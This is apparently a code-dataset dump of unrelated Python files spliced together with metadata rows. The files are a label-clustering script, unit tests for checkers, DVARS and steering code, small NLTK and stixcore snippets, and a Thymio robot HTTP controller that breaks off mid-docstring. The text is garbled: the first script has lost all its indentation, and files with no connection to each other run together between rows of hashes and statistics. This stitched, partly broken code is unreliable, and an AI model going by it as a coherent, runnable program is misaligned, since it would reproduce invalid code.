self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(str(doc_id) + '\t' + '|'.join([str(a) for a in activated_clusters]) + '\n')
pickle.dump(self.doc_id2activated_clusters, pickle_f)
pickle.dump(self.seed2cluster_idx, open(os.path.join(out_dir, 'seed2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2seed, open(os.path.join(out_dir, 'cluster_idx2seed.p'), 'wb'))
print("Average number of activated clusters per input doc:", np.mean(temp))
print("Total number of clusters:", len(self.clusters))
def generate_preliminary_exp_data(self):
PRELIMINARY_EXP_DATA = []
out_dir = os.path.join(self.data_dir, 'MCC/{}_{}_{}_{}'.format(self.min_cluster_size, self.max_cluster_size,
self.max_freq_threshold, self.add_none))
with open(os.path.join(out_dir, 'train.p'), 'wb') as pf:
for d in self.train_data:
PRELIMINARY_EXP_DATA.append((d[0], d[1], self.doc_id2activated_clusters[d[0]]))
pickle.dump(PRELIMINARY_EXP_DATA, pf)
def compute_class_counts(self):
out_dir = os.path.join(self.data_dir, 'MCC/{}_{}_{}_{}'.format(self.min_cluster_size, self.max_cluster_size,
self.max_freq_threshold, self.add_none))
# label_class_counts = dict()
# for seed, idx2count_dict in self.label_class_counts.items():
# label_class_counts[seed] = [idx2count_dict[k] for k in sorted(idx2count_dict)]
# print(label_class_counts)
cluster_class_counts = {seed: sum(counts) for seed, counts in self.label_class_counts.items()}
cluster_class_counts = [cluster_class_counts[self.cluster_idx2seed[i]] for i in
range(len(cluster_class_counts))]
cluster_class_counts = [(self.n - c) / c for c in cluster_class_counts]
label_class_counts = {self.seed2cluster_idx[k]: v for k, v in self.label_class_counts.items()}
# the inner-cluster class counts are now in a dictionary where they are looked up by their index in the
# MLCC step, rather then by their seed
pickle.dump(label_class_counts, open(os.path.join(out_dir, 'local_class_counts.p'), 'wb'))
pickle.dump(cluster_class_counts, open(os.path.join(out_dir, 'global_cluster_counts.p'), 'wb'))
def generate_activated_clusters_for_dev_data(self):
print(self.clusters)
pass
def main(self):
self.split_data_by_clusters('train')
self.split_data_by_clusters('dev')
self.split_into_cluster_prediction_data()
self.generate_preliminary_exp_data()
self.compute_class_counts()
if __name__ == '__main__':
data_dir = 'processed_data/german/'
# data_dir = 'processed_data/cantemist/'
# data_dir = 'processed_data/spanish/es/'
# clusterer = MC2CLabelClusterer(data_dir, max_cluster_size=10, min_cluster_size=5, max_freq_threshold=0.25)
clusterer = MC2CHierarchicalLabelClusterer(data_dir, max_cluster_size=15, min_cluster_size=5,
max_freq_threshold=0.25)
clusterer.main()
label_freqs = clusterer.compute_label_freqs()
for k, v in clusterer.clusters.items():
print(label_freqs[k], '---', [label_freqs[l] for l in v])
print(clusterer.mlb.classes_[k], '---', [clusterer.mlb.classes_[l] for l in v])
# print(clusterer.cluster_idx2seed[2])
# print(clusterer.cluster_idx2seed[3])
# print(clusterer.cluster_idx2seed[4])
#
# clusterer.generate_clusters_by_freq()
# all_labels = []
# for k, v in clusterer.clusters.items():
# print(k, '---', v)
# # all_labels.append(k)
# all_labels += v
#
# print(len(all_labels))
# print(len(set(all_labels)))
# # print(len(clusterer.clusters[11]))
# # print(mlb.classes_[1])
# #
# label_freqs = clusterer.compute_label_freqs()
# for k, v in clusterer.clusters.items():
# print(label_freqs[k], '---', [label_freqs[l] for l in v])
#
# print(clusterer.C[1,55])
# print(all_labels)
# seed = 7
# for seed in clusterer.determine_seeds():
# new_E = clusterer.E[list(clusterer.clusters[seed]), :]
#
# new_array = [tuple(row) for row in new_E.T]
# counts = Counter(new_array)
# print("total unique combos of seed {}:".format(str(seed)), len(set(new_array)))
# print(counts.values())
# print('-' * 100)
| 57.475722 | 123 | 0.577599 | 12,263 | 93,513 | 4.224578 | 0.034249 | 0.015635 | 0.023549 | 0.024322 | 0.972938 | 0.970853 | 0.969405 | 0.968826 | 0.967745 | 0.965873 | 0 | 0.00998 | 0.320672 | 93,513 | 1,626 | 124 | 57.51107 | 0.805528 | 0.203373 | 0 | 0.953648 | 0 | 0 | 0.049793 | 0.010813 | 0 | 0 | 0 | 0 | 0.012017 | 1 | 0.04721 | false | 0.006009 | 0.007725 | 0 | 0.063519 | 0.017167 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d1f8193c4d6fec81d602120c92fa3bd5f4b99b2a | 5,107 | py | Python | test_checker.py | Fuchai/alphazero-checker | 2dbe3161db7157bc5a9a88e5dd02d1b923a41734 | [
"MIT"
] | null | null | null | test_checker.py | Fuchai/alphazero-checker | 2dbe3161db7157bc5a9a88e5dd02d1b923a41734 | [
"MIT"
] | null | null | null | test_checker.py | Fuchai/alphazero-checker | 2dbe3161db7157bc5a9a88e5dd02d1b923a41734 | [
"MIT"
] | null | null | null | from unittest import TestCase
from checker import *
class TestChecker(TestCase):
def test_init_new_board(self):
checker = Checker()
checker.init_new_board()
print(checker)
checker.state[0, 0] = 0
checker.state[0, 4] = 100
print(checker)
checker.flip_board()
print(checker)
# player_play_verbose(checker.state)
print(checker.state.get_legal_actions())
# player_play_verbose(checker.state)
def test_multi_jump(self):
# fake_board = np.array([[1, 0, 0, 0, 0, 0, 0, 0],
# [0, -1, 0, 0, 0, 0, 0, -1],
# [1, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, -1, 0, -1, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, -1, 0, -1, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0]])
fake_board=np.array([[ 1, 0, 0, 0, 0, 0, 0, 0],
[ 0,-1, 0, 0, 0, 0, 0,-1],
[ 1, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0,-1, 0,-1, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0,-1, 0,-1, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0]])
checker = Checker()
checker.state.board=fake_board
print(checker)
actions, move_tree=checker.state.get_legal_actions()
checker.print_moves(move_tree)
def test_man_becomes_king(self):
fake_board = np.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, -1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -1, 0, -1, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, -1, 0, -1, 0, -1, 0],
[0, 0, 0, 0, 0, 0, 0, 0]])
checker = Checker()
checker.state.board = fake_board
print(checker)
actions, move_tree = checker.state.get_legal_actions()
checker.print_moves(move_tree)
def test_king_multi_jump(self):
fake_board = np.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, -1, 0, -1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[-1, 0, 0, 0, 0, 0, -1, 0],
[0, 0, 0, 0, 0, 0, 0, 2]])
checker = Checker()
checker.state.board = fake_board
print(checker)
actions, move_tree = checker.state.get_legal_actions()
checker.print_moves(move_tree)
def test_fast_inputs(self):
fake_board = np.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, -1, 0, -1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[-1, 0, 0, 0, 0, 0, -1, 0],
[0, 0, 0, 0, 0, 0, 0, 2]])
path = [(7, 7, 5, 5), (5, 5, 3, 3), (3, 3, 5, 1)]
checker = Checker()
checker.state.board = fake_board
final = checker.player_play_fast_enter(checker.state, path)
def test_fast_inputs(self):
fake_board = np.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, -1, 0, -1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[-1, 0, 0, 0, 0, 0, -1, 0],
[0, 0, 0, 0, 0, 0, 0, 2]])
path = [(7, 7, 5, 5), (5, 5, 3, 3), (3, 3, 5, 1)]
checker = Checker()
print(checker)
checker.state.board = fake_board
final = checker.ask_human_for_action(checker.state)
def test_get_legal_actions(self):
fake_board = np.array([[1, 0, 1, 0, 1, 0, 1, 0],
[0, 1, 0, 1, 0, 1, 0, 1],
[0, 0, 1, 0, 1, 0, 1, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, -1, 0, 0, 0, 0, 0],
[0, -1, 0, 0, 0,-1, 0, -1],
[-1, 0,-1, 0,-1, 0, -1, 0],
[0, -1, 0,-1, 0, 0, 0, -1]])
checker = Checker()
print(checker)
checker.state.board = fake_board
checker.ask_human_for_action(checker.state)
checker.state.get_legal_actions() | 43.279661 | 67 | 0.341492 | 712 | 5,107 | 2.356742 | 0.070225 | 0.384982 | 0.505959 | 0.588796 | 0.824791 | 0.758045 | 0.756257 | 0.692491 | 0.661502 | 0.661502 | 0 | 0.185543 | 0.49344 | 5,107 | 118 | 68 | 43.279661 | 0.463085 | 0.091639 | 0 | 0.708333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.072917 | false | 0 | 0.020833 | 0 | 0.104167 | 0.125 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
ae05fe4d120564fdf23cc4dcb453fb52aeca517d | 5,613 | py | Python | qap/test_dvars.py | wangkangcheng/ccc | bd4658f6b11a39649f709b42b98fa7cc76fe97f9 | [
"BSD-3-Clause"
] | null | null | null | qap/test_dvars.py | wangkangcheng/ccc | bd4658f6b11a39649f709b42b98fa7cc76fe97f9 | [
"BSD-3-Clause"
] | null | null | null | qap/test_dvars.py | wangkangcheng/ccc | bd4658f6b11a39649f709b42b98fa7cc76fe97f9 | [
"BSD-3-Clause"
] | null | null | null |
test_sub_dir = "test_data/1019436/session_1"
def test_remove_zero_variance_voxels():
import os
import pickle
import pkg_resources as p
import nibabel as nb
from qap.dvars import remove_zero_variance_voxels
func_motion = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"func_motion_correct", \
"rest_calc_tshift_resample_" \
"volreg.nii.gz"))
func_mask = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"functional_brain_mask", \
"rest_calc_tshift_resample_volreg" \
"_mask.nii.gz"))
ref_out = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"dvars_data", \
"no_zero_variance_voxels_mask.p"))
func_img = nb.load(func_motion)
mask_img = nb.load(func_mask)
func_data = func_img.get_data()
mask_data = mask_img.get_data()
out_mask_data = remove_zero_variance_voxels(func_data, mask_data)
with open(ref_out, "r") as f:
ref_mask_data = pickle.load(f)
# create a vector of True and False values
bool_vector = ref_mask_data == out_mask_data
assert bool_vector.all()
def test_load():
import os
import pickle
import pkg_resources as p
import nibabel as nb
from qap.dvars import load
func_motion = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"func_motion_correct", \
"rest_calc_tshift_resample_" \
"volreg.nii.gz"))
func_mask = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"functional_brain_mask", \
"rest_calc_tshift_resample_volreg" \
"_mask.nii.gz"))
ref_out = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"dvars_data", \
"loaded_func.p"))
func_out_data = load(func_motion, func_mask)
# to match the size of the reference output (shortened for file size
# issues)
func_out_data = func_out_data[0:20]
with open(ref_out, "r") as f:
ref_out_data = pickle.load(f)
# create a vector of True and False values
bool_vector = ref_out_data == func_out_data
assert bool_vector.all()
def test_robust_stdev():
import os
import pickle
import pkg_resources as p
import nibabel as nb
from qap.dvars import robust_stdev
func_data_file = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"dvars_data", \
"loaded_func.p"))
ref_out = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"dvars_data", \
"robust_stdev_output.p"))
with open(func_data_file, "r") as f:
func_data = pickle.load(f)
with open(ref_out, "r") as f:
ref_mask_data = pickle.load(f)
func_out_data = robust_stdev(func_data)
# create a vector of True and False values
bool_vector = ref_mask_data == func_out_data
assert bool_vector.all()
def test_ar1():
import os
import pickle
import pkg_resources as p
import nibabel as nb
from qap.dvars import ar1
func_data_file = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"dvars_data", \
"loaded_func.p"))
ref_out = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"dvars_data", \
"ar1_output.p"))
with open(func_data_file, "r") as f:
func_data = pickle.load(f)
with open(ref_out, "r") as f:
ref_out_data = pickle.load(f)
func_out_data = ar1(func_data)
# create a vector of True and False values
bool_vector = ref_out_data == func_out_data
assert bool_vector.all()
def run_all_tests_dvars():
test_remove_zero_variance_voxels()
test_load()
test_robust_stdev()
test_ar1() | 32.633721 | 76 | 0.445038 | 570 | 5,613 | 4.033333 | 0.140351 | 0.031318 | 0.047847 | 0.086994 | 0.830796 | 0.77599 | 0.77599 | 0.753371 | 0.753371 | 0.753371 | 0 | 0.008929 | 0.481204 | 5,613 | 172 | 77 | 32.633721 | 0.780563 | 0.042402 | 0 | 0.728155 | 0 | 0 | 0.09892 | 0.043964 | 0 | 0 | 0 | 0 | 0.038835 | 1 | 0.048544 | false | 0 | 0.194175 | 0 | 0.242718 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ae42344b7d18e39140b54b059e3bf1b47a31b727 | 2,042 | py | Python | clients/tests/test_steering_status.py | piofthings/piwars-2019 | ac0316f8ae3e62f685509ecb41c0562106c90279 | [
"MIT"
] | null | null | null | clients/tests/test_steering_status.py | piofthings/piwars-2019 | ac0316f8ae3e62f685509ecb41c0562106c90279 | [
"MIT"
] | 31 | 2019-03-05T00:52:08.000Z | 2019-03-29T00:53:25.000Z | clients/tests/test_steering_status.py | piofthings/piwars-2019 | ac0316f8ae3e62f685509ecb41c0562106c90279 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import sys
import os.path
sys.path.append(os.path.abspath(os.path.join(
os.path.dirname(__file__), "..")) + "/models/")
from steering_status import SteeringStatus
def test_Save():
steerConfig = SteeringStatus()
steerConfig.front_left_delta = 2
steerConfig.front_right_delta = 2
steerConfig.rear_left_delta = 2
steerConfig.rear_right_delta = 2
steerConfig.save("./data/steering_status.json")
steerConfig = SteeringStatus(json_file="./data/steering_status.json")
try:
assert steerConfig.front_left_delta == 2
print("Success front_left_delta")
except AssertionError as e:
print("Failed front_right_delta")
try:
assert steerConfig.front_right_delta == 2
print("Success front_right_delta")
except AssertionError as e:
print("Failed front_right_delta")
try:
assert steerConfig.rear_left_delta == 2
print("Success reart_left_delta")
except AssertionError as e:
print("Failed reart_left_delta")
try:
assert steerConfig.rear_right_delta == 2
print("Success rear_right_delta")
except AssertionError as e:
print("Failed rear_right_delta")
def test_Load():
steerConfig = SteeringStatus(json_file="./data/steering_status.json")
try:
assert steerConfig.front_left_delta == 2
print("Success front_left_delta")
except AssertionError as e:
print("Failed front_right_delta")
try:
assert steerConfig.front_right_delta == 2
print("Success front_right_delta")
except AssertionError as e:
print("Failed front_right_delta")
try:
assert steerConfig.rear_left_delta == 2
print("Success reart_left_delta")
except AssertionError as e:
print("Failed reart_left_delta")
try:
assert steerConfig.rear_right_delta == 2
print("Success rear_right_delta")
except AssertionError as e:
print("Failed rear_right_delta")
test_Save()
test_Load()
| 25.525 | 73 | 0.683643 | 250 | 2,042 | 5.304 | 0.164 | 0.120664 | 0.10181 | 0.108597 | 0.823529 | 0.745098 | 0.745098 | 0.745098 | 0.745098 | 0.745098 | 0 | 0.008217 | 0.225269 | 2,042 | 79 | 74 | 25.848101 | 0.829962 | 0.010284 | 0 | 0.736842 | 0 | 0 | 0.234158 | 0.040099 | 0 | 0 | 0 | 0 | 0.280702 | 1 | 0.035088 | false | 0 | 0.052632 | 0 | 0.087719 | 0.280702 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ae96328e766960c0c305b5d632af3725c0c6a24c | 44 | py | Python | List_Find.py | mcjohnchristopher/Python_Samples | 738f3b7d9baa7f4e396647f380118eba66ea645c | [
"CC0-1.0"
] | null | null | null | List_Find.py | mcjohnchristopher/Python_Samples | 738f3b7d9baa7f4e396647f380118eba66ea645c | [
"CC0-1.0"
] | null | null | null | List_Find.py | mcjohnchristopher/Python_Samples | 738f3b7d9baa7f4e396647f380118eba66ea645c | [
"CC0-1.0"
] | null | null | null | some = [1,2,3,4,5,6,7]
9 in some
6 in some | 14.666667 | 23 | 0.568182 | 14 | 44 | 1.785714 | 0.714286 | 0.48 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.264706 | 0.227273 | 44 | 3 | 24 | 14.666667 | 0.470588 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
883b5b4414a6855768c03f5b977f7577c602fa92 | 376 | py | Python | stixcore/products/__init__.py | samaloney/STIXCore | ad9526cc37701aabcbe64bea249cb77d2313e5c6 | [
"BSD-3-Clause"
] | 1 | 2021-07-15T14:57:25.000Z | 2021-07-15T14:57:25.000Z | stixcore/products/__init__.py | samaloney/STIXCore | ad9526cc37701aabcbe64bea249cb77d2313e5c6 | [
"BSD-3-Clause"
] | null | null | null | stixcore/products/__init__.py | samaloney/STIXCore | ad9526cc37701aabcbe64bea249cb77d2313e5c6 | [
"BSD-3-Clause"
] | null | null | null | from stixcore.products.level0.housekeeping import MaxiReport, MiniReport
from stixcore.products.level0.quicklook import LightCurve
from stixcore.products.level0.science import Aspect, CompressedPixelData, SummedPixelData
from stixcore.products.level1.quicklook import LightCurve
from stixcore.products.levelb.binary import LevelB
from stixcore.products.product import Product
| 53.714286 | 89 | 0.875 | 44 | 376 | 7.477273 | 0.409091 | 0.218845 | 0.364742 | 0.237082 | 0.273556 | 0.273556 | 0 | 0 | 0 | 0 | 0 | 0.011461 | 0.071809 | 376 | 6 | 90 | 62.666667 | 0.931232 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
88579d03c9a057d5a7595c11cacd542ebfa682e3 | 125 | py | Python | Module 3/Chapter 5/ch5_6.py | PacktPublishing/Natural-Language-Processing-Python-and-NLTK | bb7fd9a3071b4247d13accfbf0a48eefec76e925 | [
"MIT"
] | 50 | 2016-12-11T13:49:01.000Z | 2022-03-20T19:47:55.000Z | Module 3/Chapter 5/ch5_6.py | PacktPublishing/Natural-Language-Processing-Python-and-NLTK | bb7fd9a3071b4247d13accfbf0a48eefec76e925 | [
"MIT"
] | null | null | null | Module 3/Chapter 5/ch5_6.py | PacktPublishing/Natural-Language-Processing-Python-and-NLTK | bb7fd9a3071b4247d13accfbf0a48eefec76e925 | [
"MIT"
] | 40 | 2017-06-14T14:02:48.000Z | 2021-10-14T06:25:00.000Z | import nltk
from nltk.corpus import sinica_treebank
print(sinica_treebank.sents())
print(sinica_treebank.parsed_sents()[27])
| 25 | 41 | 0.832 | 18 | 125 | 5.555556 | 0.555556 | 0.42 | 0.38 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017094 | 0.064 | 125 | 4 | 42 | 31.25 | 0.837607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 7 |
88918c6bd9a0477c3f60a62d915d66d54a0f4b93 | 35,640 | py | Python | thymio/thymiolib/__init__.py | heia-fr/thymio-captain | 6681ed0dfa0eaa037a8cf864bfa6c1c6411affd1 | [
"Apache-2.0"
] | 1 | 2016-10-17T07:56:05.000Z | 2016-10-17T07:56:05.000Z | thymio/thymiolib/__init__.py | BlueMasters/thymio-captain | 6681ed0dfa0eaa037a8cf864bfa6c1c6411affd1 | [
"Apache-2.0"
] | 26 | 2016-02-10T09:53:14.000Z | 2016-04-11T16:37:14.000Z | thymio/thymiolib/__init__.py | heia-fr/thymio-captain | 6681ed0dfa0eaa037a8cf864bfa6c1c6411affd1 | [
"Apache-2.0"
] | null | null | null | import httplib2
import json
"""
@author: Damien Goetschi
@organiation: Haute ecole d'ingenierie et d'architecture Fribourg
"""
class ThymioController:
"""
This class allows the user to control all leds, motors and sensors of a thymio
"""
__errorConnReset = "Error: Connection reset by peer. Please check the Thymio is well connected to the Raspberry Pi"
__errorConnRefused = "Error: Connection refused. Please check the Thymio is well connected to the Raspberry Pi or " \
"you entered the correct IP address"
__errorNotFound = "Server not found. Please check you entered the correct IP address"
__errorNoRoute = "No route to host. Please check you entered the correct IP address"
__ip = "localhost"
"""IP address on which asebahttp runs"""
__port = 3000
"""port on which asebahttp runs"""
__rootUrl = ""
"""URL build with ip and port"""
__debug = False
"""Debug mode"""
__http = httplib2.Http()
"""Http objet to call RESTful API"""
def __init__(self, ip="localhost", port=3000, debug=False):
"""
Create a thymio controller with an ip address and a given port
@param ip: asebahttp's ip
@type ip: string
@param port: asebahttp's port
@type port: int
@param debug: true if debug mode is active (print detail about errors)
@type debug: bool
"""
self.__ip = ip
self.__port = port
self.__debug = debug
self.__rootUrl = "http://{0}:{1}/nodes/thymio-II/".format(self.__ip, self.__port)
def get_motors(self):
"""Get real speed for each motor
This returns the speed of both thymio motors.
@return: A list of two values containing the left and right motor values
@rtype: list of int [left, right] (empty list in case of error)
@note: \n
>>> t.get_motors()
[-52, 137]
"""
try:
response, content = self.__http.request(self.__rootUrl+"motor.left.speed", "GET")
left = (json.loads(content.decode('utf-8'))[0])
response, content = self.__http.request(self.__rootUrl+"motor.right.speed", "GET")
right = (json.loads(content.decode('utf-8'))[0])
return [left, right]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return []
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return []
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return []
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return []
def set_motors(self, left, right):
"""Change target speed for each motor
This changes the speed of both motors and return True on success.
@param left: Left motor speed
@param right: Right motor speed
@type left: int (between -500 and 500)
@type right: int (between -500 and 500)
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> t.set_motors(500, -500)
True
>>> t.set_motors(-1000, 0)
False
>>> t.set_motors(0, 0)
True
"""
if type(left)!=int or type(right)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_motors.__doc__)
return False
if left > 500 or left < -500 or right > 500 or right < -500:
if self.__debug:
print("Error: params not in range\n"+self.set_motors.__doc__)
return False
try:
self.__http.request(self.__rootUrl+"eventMotors/{0}/{1}".format(left,right), "POST")
return True
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def get_prox_h(self):
"""Get values for horizontal ir sensor.
This returns the values of each horizontal ir sensor.
@return: A value between 0 and 5000 for each of 7 sensors.
The higher the value, the closer an object
[0-4]: front sensors left to right
[5-6]: back sensors left to right
@rtype: list of int (empty list in case of error)
@note: \n
>>> t.get_prox_h()
[0, 2701, 2579, 2489, 0, 3632, 4490]
"""
try:
response, content = self.__http.request(self.__rootUrl+"prox.horizontal")
return json.loads(content.decode('utf-8'))
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return []
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return []
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return []
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return []
def get_prox_v(self):
"""Get values for vertical (ground) ir sensor.
This returns the values of each vertical ir sensor.
@return: A value between 0 and 1000 for each of 2 sensors.
The higher the value, the lighter the ground.
[0-1]: ground sensors left to right
@rtype: list of int (empty list in case of error)
@note: \n
>>> t.get_prox_v()
[980,240]
"""
try:
response, content = self.__http.request(self.__rootUrl+"prox.ground.delta", "GET")
return json.loads(content.decode('utf-8'))
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return []
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return []
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return []
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return []
def get_acc(self):
"""Get values of accelerometer.
This returns the values of each axis.
@return: A value for each of 3 axis.
[roll,pitch,yaw]
@rtype: list of int (empty list in case of error)
@note: \n
>>> t.get_acc()
[1,-1,23]
"""
try:
response, content = self.__http.request(self.__rootUrl+"acc")
return json.loads(content.decode('utf-8'))
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return []
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return []
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return []
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return []
def get_button_backward(self):
"""Get value of backward button.
This returns the current state of the button
@return: 1 if button is pressed, 0 otherwise; -1 in case of error
@rtype: int
@note: \n
>>> t.get_button_backward()
0
"""
try:
response, content = self.__http.request(self.__rootUrl+"button.backward")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
def get_button_center(self):
"""Get value of center button.
This returns the current state of the button
@@return: 1 if button is pressed, 0 otherwise; -1 in case of error
@rtype: int
@note: \n
>>> t.get_button_center()
1
"""
try:
response, content = self.__http.request(self.__rootUrl+"button.center")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
def get_button_forward(self):
"""Get value of forward button.
This returns the current state of the button
@@return: 1 if button is pressed, 0 otherwise; -1 in case of error
@rtype: int
@note: \n
>>> t.get_button_forward()
0
"""
try:
response, content = self.__http.request(self.__rootUrl+"button.forward")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
def get_button_left(self):
"""Get value of left button.
This returns the current state of the button
@@return: 1 if button is pressed, 0 otherwise; -1 in case of error
@rtype: int
@note: \n
>>> t.get_button_left()
1
"""
try:
response, content = self.__http.request(self.__rootUrl+"button.left")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
def get_button_right(self):
"""Get value of right button.
This returns the current state of the button
